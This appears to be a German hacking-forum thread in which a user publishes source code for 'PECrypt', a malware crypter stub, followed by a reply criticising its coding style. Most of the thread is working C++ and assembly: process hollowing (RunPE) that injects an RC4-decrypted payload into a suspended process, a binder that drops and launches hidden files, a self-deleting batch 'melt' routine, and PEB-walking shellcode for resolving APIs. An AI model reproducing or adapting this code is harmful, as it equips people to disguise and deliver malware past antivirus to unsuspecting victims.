Ergebnis 1 bis 5 von 5
  1. #1
    Liebe (Amor) Avatar von Cyber Tjak
    Registriert seit
    16.03.2010
    Beiträge
    231

    Standard PECrypt geht OpenSource

    Hab keine Verwendung mehr.
    Werde langsam mal Source schnipsel posten, ist noch viel unnützer code drin der zu fixen ist (ist alles Debug Style hrhr)

    Alles zu lernzwecken.

    Hier beginnt die Stub, Cpp:
    Code:
    #define WIN32_LEAN_AND_MEAN
    
    #include <Windows.h>
    
    UCHAR NTDLLDLL_STR[]                = "NTDLL.DLL";
    UCHAR SHELL32_STR[]                 = "SHELL32.DLL";
    UCHAR KERNEL32DLL_STR[]                = "KERNEL32.DLL";
    
    UCHAR LSTRCATA_STR[]                = "lstrcatA";
    UCHAR HEAPALLOC_STR[]                = "HeapAlloc";
    UCHAR WRITEFILE_STR[]               = "WriteFile";
    UCHAR EXITPROCESS_STR[]             = "ExitProcess";
    UCHAR CLOSEHANDLE_STR[]             = "CloseHandle";
    UCHAR CREATEFILE_STR[]              = "CreateFileA";
    UCHAR RESUMETHREAD_STR[]            = "ResumeThread";
    UCHAR SHELLEXECUTE_STR[]            = "ShellExecuteA";
    UCHAR LOCKRESOURCE_STR[]            = "LockResource";
    UCHAR LOADRESOURCE_STR[]            = "LoadResource";
    UCHAR LOADLIBRARYA_STR[]            = "LoadLibraryA";
    UCHAR RTLMOVEMEMORY_STR[]            = "RtlMoveMemory";
    UCHAR FINDRESOURCEA_STR[]            = "FindResourceA";
    UCHAR SIZEOFRESOURCE_STR[]            = "SizeofResource";
    UCHAR GETPROCESSHEAP_STR[]            = "GetProcessHeap";
    UCHAR VIRTUALALLOCEX_STR[]            = "VirtualAllocEx";
    UCHAR CREATEPROCESSA_STR[]            = "CreateProcessA";
    UCHAR GETTHREADCONTEXT_STR[]        = "GetThreadContext";
    UCHAR SETTHREADCONTEXT_STR[]        = "SetThreadContext";
    UCHAR GETMODULEFILENAMEA_STR[]        = "GetModuleFileNameA";
    UCHAR NTWRITEVIRTUALMEMORY_STR[]    = "NtWriteVirtualMemory";
    UCHAR NTUNMAPVIEWOFSECTION_STR[]    = "NtUnmapViewOfSection";
    UCHAR GETENVIROMENTVARIABLE_STR[]   = "GetEnvironmentVariableA";
    
    UCHAR ALL_ENCRYPTION_KEY_STR[]      = "PECrypt_Encryption_Password_Place_Holder||||||";
    
    UCHAR TEMP_VAR[] = "TEMP";
    UCHAR SHELL_CMD[] = "OPEN";
    UCHAR BACKSPACE_STR[] = "\\";
    
    UCHAR RESOURCE_NAME[] = "RTDATA";
    
    UCHAR BATCH[] = ".BAT";
    UCHAR MELT_BATCH1[] = "@ECHO OFF\r\n:L\r\nDEL \"";
    UCHAR MELT_BATCH2[] = "\"\r\nIF EXIST \"";
    UCHAR MELT_BATCH3[] = "\" GOTO L\r\nM:\r\nDEL \"";
    UCHAR MELT_BATCH4[] = "\"\r\n:M\r\nIF EXIST \"";
    UCHAR MELT_BATCH5[] = "\" GOTO M\r\n";
    
    UCHAR API_SHELL[] =
        "\xE8\x01\x00\x00\x00\xC3\x55\x89\xE5\x83\xEC\x24\x89\x45\xDC\x89"
        "\x5D\xE0\x89\x4D\xE4\x31\xC0\x31\xDB\x31\xC9\x64\x8B\x71\x30\x8B"
        "\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x36\x38\x4F\x18"
        "\x75\xF3\x89\x45\xEC\x89\xC6\x03\x70\x3C\x89\x75\xF0\x83\xC6\x78"
        "\x03\x06\x89\x45\xF8\x8B\x5D\xEC\x03\x58\x20\x89\x5D\xF4\x8B\x7D"
        "\xF4\x31\xC9\x8B\x5D\xEC\x03\x1F\x81\x3B\x47\x65\x74\x50\x74\x06"
        "\x83\xC7\x04\x41\xEB\xED\x81\x7B\x04\x72\x6F\x63\x41\x74\x06\x83"
        "\xC7\x04\x41\xEB\xDE\x89\xCF\x8B\x45\xF8\x8B\x5D\xEC\x83\xC0\x24"
        "\x03\x18\xD1\xC1\x01\xCB\x31\xC9\x0F\xB7\x0B\xC1\xC1\x02\x8B\x45"
        "\xF8\x8B\x5D\xEC\x83\xC0\x1C\x03\x18\x01\xCB\x8B\x03\x03\x45\xEC"
        "\x89\x45\xE8\xFF\x75\xE4\xFF\x75\xEC\xFF\x55\xE8\xFF\x75\xDC\xFF"
        "\xD0\xFF\x75\xE0\x50\xFF\x55\xE8\xC9\xC3";
    
    typedef struct _RESSOURCE_STRCT
    {
        CHAR*  ReadByte;
        DWORD  ReadByteSize;
    } RESSOURCE_STRCT, *PRESSOURCE_STRCT;
    
    typedef LPVOID    (__stdcall* HeapAllocF)(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
    typedef DWORD     (__stdcall* ResumeThreadF)(HANDLE hThread);
    typedef LPVOID    (__stdcall* LockResourceF)(HGLOBAL hResData);
    
    typedef HANDLE    (__stdcall* GetProcessHeapF)(VOID);
    typedef VOID*     (__stdcall* VirtualAllocExF)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
    typedef BOOL      (__stdcall* CreateProcessAF)(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);;
    typedef VOID      (__stdcall* RtlMoveMemoryF)(VOID UNALIGNED *Destination, CONST VOID UNALIGNED *Source, SIZE_T Length);
    typedef HRSRC     (__stdcall* FindResourceAF)(HMODULE hModule, LPCSTR lpName, LPCSTR lpType);
    typedef HGLOBAL   (__stdcall* LoadResourceF)(HMODULE hModule,HRSRC hResInfo);
    typedef DWORD       (__stdcall* SizeOfResourceF)(HMODULE hModule, HRSRC hResInfo);
    typedef BOOL      (__stdcall* GetThreadContextF)(HANDLE hThread, LPCONTEXT lpContext);
    typedef BOOL      (__stdcall* SetThreadContextF)(HANDLE hThread, CONST CONTEXT *lpContext);
    
    typedef DWORD     (__stdcall* GetModuleFileNameF)(HMODULE hModule, LPCH lpFilename, DWORD nSize);
    typedef BOOL      (__stdcall* NtWriteVirtualMemoryF)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
    typedef LONG      (__stdcall* NtUnmapViewOfSectionF)(HANDLE ProcessHandle, PVOID BaseAddress); 
    
    typedef DWORD     (__stdcall* GetEnvironmentVariableAF)(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize);
    typedef HINSTANCE (__stdcall* ShellExecuteF)(HWND hwnd, LPCTSTR lpOperation, LPCTSTR lpFile, LPCTSTR lpParameters, LPCTSTR lpDirectory, INT nShowCmd);
    typedef HANDLE    (__stdcall* CreateFileF)(LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
    typedef BOOL      (__stdcall* WriteFileF)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
    typedef BOOL      (__stdcall* CloseHandleF)(HANDLE hObject);
    
    typedef LPSTR     (__stdcall* lstrcatAF)(LPSTR lpString1, LPCSTR lpString2);
    typedef VOID      (__stdcall* ExitProcessF)(UINT uExitCode);
    
    lstrcatAF             lstrcatA_;
    HeapAllocF            HeapAlloc_;
    WriteFileF            WriteFile_;
    CreateFileF           CreateFile_;
    CloseHandleF          CloseHandle_;
    ExitProcessF          ExitProcess_;
    ResumeThreadF         ResumeThread_;
    LockResourceF          LockResource_;
    LoadResourceF          LoadResource_;
    ShellExecuteF         ShellExecute_;
    RtlMoveMemoryF          RtlMoveMemory_;
    FindResourceAF          FindResource_;
    SizeOfResourceF          SizeOfResource_;    
    GetProcessHeapF       GetProcessHeap_;
    VirtualAllocExF       VirtualAllocEx_;
    CreateProcessAF       CreateProcessA_;
    GetThreadContextF     GetThreadContext_;
    SetThreadContextF     SetThreadContext_;
    GetModuleFileNameF    GetModuleFileName_;
    NtWriteVirtualMemoryF NtWriteVirtualMemory_;
    NtUnmapViewOfSectionF NtUnmapViewOfSection_;
    GetEnvironmentVariableAF GetEnvironmentVariableA_;
    
    VOID SetupAPI(CONST CHAR* DLLName, CONST CHAR* FunctionName, LPVOID WriteVar);
    LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen);
    PRESSOURCE_STRCT LoadResourceData(INT INT_RES, CONST CHAR* RS_NAME);
    VOID BinderExecute(PRESSOURCE_STRCT ResStruct);
    DWORD RunPE(LPBYTE InjectByte);
    LPVOID GetAddr(LPVOID String);
    VOID MeltFile(VOID);
    VOID GetAPIAddr();
    
    INT WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nShowCmd)
    {
        PRESSOURCE_STRCT OptionsResStrc = 0;
        PRESSOURCE_STRCT InjectResStrc = 0;
        PRESSOURCE_STRCT BindResStrc = 0;
    
        GetAPIAddr();
    
        OptionsResStrc = LoadResourceData(101, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
        
        //OptionsResStrc->ReadByte = (CHAR*)RC4((LPBYTE)OptionsResStrc->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), OptionsResStrc->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
    
        InjectResStrc = LoadResourceData(102, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
    
        BindResStrc   = LoadResourceData(103, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
    
        if(BindResStrc->ReadByteSize != 0)
        {
            BinderExecute(BindResStrc);
        };
    
        //InjectResStrc->ReadByte = (CHAR*)RC4((LPBYTE)InjectResStrc->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), InjectResStrc->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
    
        RunPE((LPBYTE)InjectResStrc->ReadByte);
    
        if(OptionsResStrc->ReadByte[0] == '1')
        {
            MeltFile();
        };
    
        return 0;
    };
    
    VOID MeltFile(VOID)
    {
        CHAR* MyPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
        GetModuleFileName_(NULL, MyPath, MAX_PATH);
        
        CHAR* NewPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
        GetEnvironmentVariableA_((LPCSTR)GetAddr(&TEMP_VAR), NewPath, MAX_PATH);
        lstrcatA_(NewPath, (CHAR*)GetAddr(&BACKSPACE_STR));
    
        CHAR* BATCH_DATA = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, 1024);
        lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH1));
        lstrcatA_(BATCH_DATA, MyPath);
        lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH2));
        lstrcatA_(BATCH_DATA, MyPath);
        lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH3));
        lstrcatA_(BATCH_DATA, NewPath);
        lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&RESOURCE_NAME));
        lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&BATCH));
        lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH4));
        lstrcatA_(BATCH_DATA, NewPath);
        lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&RESOURCE_NAME));
        lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&BATCH));
        lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH5));
    
        lstrcatA_(NewPath, (CHAR*)GetAddr(&RESOURCE_NAME));
        lstrcatA_(NewPath, (CHAR*)GetAddr(&BATCH));
    
        HANDLE hFile = CreateFile_((LPCSTR)NewPath, GENERIC_WRITE, 0, 0, CREATE_NEW, NULL, NULL);
        DWORD dwWritten = 0;
    
        DWORD nSize = 0;
        do
        {
            nSize++;
        }
        while(BATCH_DATA[nSize] != '\0');
    
        WriteFile_(hFile, BATCH_DATA, nSize, &dwWritten, NULL);
    
        CloseHandle_(hFile);
    
    ShellLoop:
        if((INT)ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), NewPath, NULL, NULL, 0) < 32)
        {
            goto ShellLoop;
        };
    
        ExitProcess_(ERROR_SUCCESS);
    
        return;
    };
    
    VOID BinderExecute(PRESSOURCE_STRCT ResStruct)
    {
        DWORD I = 0;
    
        for(I = 1; I < ResStruct->ReadByteSize * 2; I++)
        {
            CHAR* TempPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
            
            GetEnvironmentVariableA_((LPCSTR)GetAddr(&TEMP_VAR), TempPath, MAX_PATH);
    
            PRESSOURCE_STRCT BinderStruct = 0;
    
            BinderStruct = LoadResourceData(103 + I, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
    
            BinderStruct->ReadByte = (CHAR*)RC4((LPBYTE)BinderStruct->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), BinderStruct->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
    
            PRESSOURCE_STRCT BindStruct2 = 0;
            BindStruct2 = LoadResourceData(103 + I + 1, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
    
            BindStruct2->ReadByte = (CHAR*)RC4((LPBYTE)BindStruct2->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), BindStruct2->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);
    
            lstrcatA_(TempPath, (CHAR*)GetAddr(BACKSPACE_STR));
            lstrcatA_(TempPath, BindStruct2->ReadByte);
    
            HANDLE hFile = CreateFile_((LPCSTR)TempPath, GENERIC_WRITE, 0, 0, CREATE_NEW, NULL, NULL);
    
            DWORD dwWritten = 0;
            WriteFile_(hFile, BinderStruct->ReadByte, BinderStruct->ReadByteSize, &dwWritten, NULL);
    
            CloseHandle_(hFile);
    
            ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), TempPath, NULL, NULL, 5);
    
            I++;
        };
    
        return;
    };
    
    LPVOID GetAddr(LPVOID String)
    {
        LPVOID RTChar = 0;
    
        _asm CALL DELTA
    
    DELTA:
        _asm POP EBX
        _asm SUB EBX, OFFSET DELTA
        _asm MOV ESI, String
        _asm LEA EAX, [EBX + ESI]
        _asm MOV RTChar, EAX
    
        return RTChar;
    };
    
    PRESSOURCE_STRCT LoadResourceData(INT INT_RES, CONST CHAR* RS_NAME)
    {
        HRSRC hRsrc = 0;
        CHAR* lpFile = 0;
        HGLOBAL hGlob = 0;
        DWORD dwFileSize = 0;
        PRESSOURCE_STRCT uResStrt;
    
        uResStrt = (PRESSOURCE_STRCT)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(RESSOURCE_STRCT));
    
        hRsrc = FindResource_(NULL, MAKEINTRESOURCE(INT_RES), RS_NAME);    
        dwFileSize = SizeOfResource_(NULL, hRsrc);
        hGlob = LoadResource_(NULL, hRsrc);
        lpFile = (CHAR*)LockResource_(hGlob);
        uResStrt->ReadByte = (CHAR*)HeapAlloc_(GetProcessHeap_(), NULL, dwFileSize);
        RtlMoveMemory_(uResStrt->ReadByte, lpFile, dwFileSize);
        uResStrt->ReadByte[dwFileSize] = '\0';
    
        uResStrt->ReadByteSize = dwFileSize;
    
        return uResStrt;
    };
    
    LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen)
    {
        INT A = 0, B = 0, S[256];
        BYTE Swap;
        DWORD dwCount;
    
        for(A = 0; A < 256; A++)
        {
            S[A] = A;
        };
    
        for(A = 0; A < 256; A++)
        {
            B = (B + S[A] + lpKey[A % dwKeyLen]) % 256;
            Swap = S[A];
            S[A] = S[B];
            S[B] = Swap;
        };
    
        A = 0;
        B = 0;
    
        for(dwCount = 0; dwCount < dwBufLen; dwCount++)
        {
            A = (A + 1) % 256;
            B = (B + S[A]) % 256;
            Swap = S[A];
            S[A] = S[B];
            S[B] = Swap;
            lpBuf[dwCount] ^= S[(S[A] + S[B]) % 256];
        };
    
        return lpBuf;
    };
    
    VOID SetupAPI(CONST CHAR* DLLName, CONST CHAR* FunctionName, LPVOID WriteVar)
    {
        DWORD AddressOfAPI_Shell = (DWORD)GetAddr(API_SHELL);
        CHAR* LoadLibStr = (CHAR*)GetAddr(LOADLIBRARYA_STR);
        LPVOID vVAR = GetAddr(WriteVar);
    
        _asm PUSHAD
        _asm MOV EAX, DLLName
        _asm MOV EBX, FunctionName
        _asm MOV ECX, LoadLibStr
        _asm CALL AddressOfAPI_Shell
    
        _asm MOV EDI, vVAR
        _asm MOV [EDI], EAX
    
        return;
    };
    
    
    DWORD RunPE(LPBYTE InjectByte)
    {
        LONG                  I = 0;
        CHAR*                 HostFile = 0;
        CONTEXT*              tCONTEXT = 0;
        STARTUPINFO*          tSTARTUPINFO = 0;
        IMAGE_DOS_HEADER*     tIMAGE_DOS_HEADER = 0;
        IMAGE_NT_HEADERS*     tIMAGE_NT_HEADERS = 0;
        PROCESS_INFORMATION*  tPROCESS_INFORMATION = 0;
        IMAGE_SECTION_HEADER* tIMAGE_SECTION_HEADER = 0;
    
        HostFile = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
        tCONTEXT = (CONTEXT*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(CONTEXT));
        tSTARTUPINFO = (STARTUPINFO*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(STARTUPINFO));
        tIMAGE_DOS_HEADER = (IMAGE_DOS_HEADER*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_DOS_HEADER));
        tIMAGE_NT_HEADERS = (IMAGE_NT_HEADERS*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_NT_HEADERS));
        tPROCESS_INFORMATION = (PROCESS_INFORMATION*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(PROCESS_INFORMATION));
        tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_SECTION_HEADER)); 
    
        tCONTEXT->ContextFlags = CONTEXT_FULL;
        tSTARTUPINFO->cb = sizeof(STARTUPINFO);
        GetModuleFileName_(NULL, HostFile, MAX_PATH);
    
        tIMAGE_DOS_HEADER = (IMAGE_DOS_HEADER*)&InjectByte[0];
        tIMAGE_NT_HEADERS = (IMAGE_NT_HEADERS*)&InjectByte[tIMAGE_DOS_HEADER->e_lfanew];
    
        if(CreateProcessA_(HostFile, NULL, NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, tSTARTUPINFO, tPROCESS_INFORMATION))
        {
            NtUnmapViewOfSection_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase); 
            VirtualAllocEx_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase, tIMAGE_NT_HEADERS->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase, &InjectByte[0], tIMAGE_NT_HEADERS->OptionalHeader.SizeOfHeaders, NULL);
    
            for(I = 0; I < tIMAGE_NT_HEADERS->FileHeader.NumberOfSections; I++)
            {
                tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_SECTION_HEADER)); 
                tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)&InjectByte[tIMAGE_DOS_HEADER->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * I]; 
                NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, (LPVOID)(tIMAGE_NT_HEADERS->OptionalHeader.ImageBase + tIMAGE_SECTION_HEADER->VirtualAddress), &InjectByte[tIMAGE_SECTION_HEADER->PointerToRawData], tIMAGE_SECTION_HEADER->SizeOfRawData, NULL);
            }; 
    
            GetThreadContext_(tPROCESS_INFORMATION->hThread, tCONTEXT);
            DWORD eImage = tIMAGE_NT_HEADERS->OptionalHeader.ImageBase;
            DWORD eEntry = tIMAGE_NT_HEADERS->OptionalHeader.AddressOfEntryPoint;
    
            NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, &eEntry, HeapAlloc_(GetProcessHeap_(), NULL, sizeof(DWORD)), sizeof(DWORD), NULL);
    
            _asm MOV EAX, eImage
            _asm ADD EAX, eEntry
            
            DWORD eEAX = 0;
            _asm MOV eEAX, EAX
    
            tCONTEXT->Eax = eEAX;
            
            SetThreadContext_(tPROCESS_INFORMATION->hThread, tCONTEXT);
            ResumeThread_(tPROCESS_INFORMATION->hThread);
    
            return tPROCESS_INFORMATION->dwProcessId;
        };
    
        return 0;
    };
    
    VOID GetAPIAddr()
    {
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LSTRCATA_STR), &lstrcatA_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&HEAPALLOC_STR), &HeapAlloc_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&WRITEFILE_STR), &WriteFile_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CREATEFILE_STR), &CreateFile_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CLOSEHANDLE_STR), &CloseHandle_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&EXITPROCESS_STR), &ExitProcess_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LOADRESOURCE_STR), &LoadResource_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&RESUMETHREAD_STR), &ResumeThread_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LOCKRESOURCE_STR), &LockResource_);
        SetupAPI((CONST CHAR*)GetAddr(&SHELL32_STR    ), (CONST CHAR*)GetAddr(&SHELLEXECUTE_STR), &ShellExecute_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&RTLMOVEMEMORY_STR), &RtlMoveMemory_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&FINDRESOURCEA_STR), &FindResource_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&SIZEOFRESOURCE_STR), &SizeOfResource_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETPROCESSHEAP_STR), &GetProcessHeap_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&VIRTUALALLOCEX_STR), &VirtualAllocEx_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CREATEPROCESSA_STR), &CreateProcessA_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETTHREADCONTEXT_STR), &GetThreadContext_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&SETTHREADCONTEXT_STR), &SetThreadContext_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETMODULEFILENAMEA_STR), &GetModuleFileName_);
        SetupAPI((CONST CHAR*)GetAddr(&NTDLLDLL_STR   ), (CONST CHAR*)GetAddr(&NTWRITEVIRTUALMEMORY_STR), &NtWriteVirtualMemory_);
        SetupAPI((CONST CHAR*)GetAddr(&NTDLLDLL_STR   ), (CONST CHAR*)GetAddr(&NTUNMAPVIEWOFSECTION_STR), &NtUnmapViewOfSection_);
        SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETENVIROMENTVARIABLE_STR), &GetEnvironmentVariableA_);
    
        return;
    };

    Hier das Api Shell (Asm), vermutlich die Ursache für die x64 Bugs:
    Code:
    ;SetupAPI Shell
    ;GetProcAddress & LoadLibraryA-Replacement
    ;
    ;Usage:
    ;EAX = Pointer to DLL-Name
    ;EBX = Pointer to Function-Name
    ;ECX = Pointer to "LoadLibraryA" (String)
    ;
    include "H:\FASM\INCLUDE\WIN32AX.INC"
    
    USE32
    
    CALL ShellCode
    RET
    
    proc ShellCode
    
    locals
        DLLName  DD ?
        FunctionName DD ?
        LoadLibraryA DD ?
        ListGPA  DD ?
        mzKernel DD ?
        peKernel DD ?
        anKernel DD ?
        etKernel DD ?
        ProcAddr DD ?
    endl
    
    ShellBegin:
    MOV [DLLName], EAX
    MOV [FunctionName], EBX
    MOV [LoadLibraryA], ECX
    
    XOR EAX, EAX
    XOR EBX, EBX
    
    XOR ECX, ECX
    MOV ESI, DWORD[FS:ECX+30h]
    MOV ESI, DWORD[ESI+0Ch]
    MOV ESI, DWORD[ESI+1Ch]
    
    KernelMark:
    MOV EAX, DWORD[ESI+8]
    MOV EDI, DWORD[ESI+20h]
    MOV ESI, DWORD[ESI]
    CMP BYTE[EDI+18h], CL
    JNE KernelMark
    
    MOV [mzKernel], EAX
    MOV ESI, EAX
    ADD ESI, DWORD[EAX+0x3C]
    MOV [peKernel], ESI
    ADD ESI, 0x78
    ADD EAX, DWORD[ESI]
    MOV [etKernel], EAX
    MOV EBX, [mzKernel]
    ADD EBX, DWORD[EAX+0x20]
    MOV [anKernel], EBX
    MOV EDI, [anKernel]
    XOR ECX, ECX
    
    LIST_GPA:
    MOV EBX, [mzKernel]
    ADD EBX, DWORD[EDI]
    
    CMP DWORD[EBX], 'GetP'
    JE GOT_PROC1
    ADD EDI, 4
    INC ECX
    JMP LIST_GPA
    
    GOT_PROC1:
    CMP DWORD[EBX+4], 'rocA'
    JE GOT_PROC2
    ADD EDI, 4
    INC ECX
    JMP LIST_GPA
    
    GOT_PROC2:
    MOV EDI, ECX
    MOV EAX, DWORD[etKernel]
    MOV EBX, DWORD[mzKernel]
    ADD EAX, 0x24
    ADD EBX, DWORD[EAX]
    ROL ECX, 1
    ADD EBX, ECX
    XOR ECX, ECX
    MOVZX ECX, WORD[EBX]
    ROL ECX, 2
    MOV EAX, DWORD[etKernel]
    MOV EBX, DWORD[mzKernel]
    ADD EAX, 0x1C
    ADD EBX, DWORD[EAX]
    ADD EBX, ECX
    MOV EAX, DWORD[EBX]
    ADD EAX, DWORD[mzKernel]
    MOV[ListGPA], EAX
    
    PUSH [LoadLibraryA]
    PUSH DWORD[mzKernel]
    CALL DWORD[ListGPA]
    
    PUSH [DLLName]
    CALL EAX
    
    PUSH [FunctionName]
    PUSH EAX
    CALL DWORD[ListGPA]
    LEAVE
    RET
    
    endp
    Und hier das in MASM kompilierbare Dump woraus ich den Shellcode erstellt habe (von mir, Tjak, gekürzt, weil der Text zu lang wäre):
    Code:
    http://nopaste.free-hack.com/index.php?id=b4504e9c86

    Viel Spaß hrhr

    Credits gehen noch an e0n (hackhound) hatte mal ne vorlage für das Api Shell genutzt.
    Rest ist 100% selfcoded.

    Hoffe ihr schätzt meine Arbeit hrhr^^
    Quelle: M4x Maximus aka Cyberterrorist M4x (Coder) von HBA-Crew - Thread-Link
    Geändert von Cyber Tjak (05.10.2010 um 15:29 Uhr)


    Ich bin der Stoff aus dem die Traeume sind.

    &


  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    Hu5eL (05.10.2010)

  3. #2
    Bad Times Virus
    Registriert seit
    14.03.2009
    Beiträge
    579

    Standard

    Credits gehen noch an e0n (hackhound) hatte mal ne vorlage für das Api Shell genutzt.
    Rest ist 100% selfcoded.
    Cryptic Mod.

    Der Binder ist ja wohl ganz grausam. Außerdem wäre dort CreateProcess() angebrachter als ShellExecute().
    Was die LPVOID GetAddr(LPVOID String) funktion soll ist mir absolut schleierhaft.

    Dann kennt der Coder noch nicht einmal strlen. Oder gibt es einen Grund für das hier?
    Code:
    DWORD nSize = 0;
    do     {         nSize++;     }     while(BATCH_DATA[nSize] != '\0');
    WriteFile_(hFile, BATCH_DATA, nSize, &dwWritten, NULL);
    Und auch while gehört anscheinend nicht zum Kentnissstand des Coders
    Code:
    ShellLoop:     
    if((INT)ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), NewPath, NULL, NULL, 0) < 32) 
        {
     goto ShellLoop;
    };
    (Was das Semikolon da soll weiß ich auch nicht.)

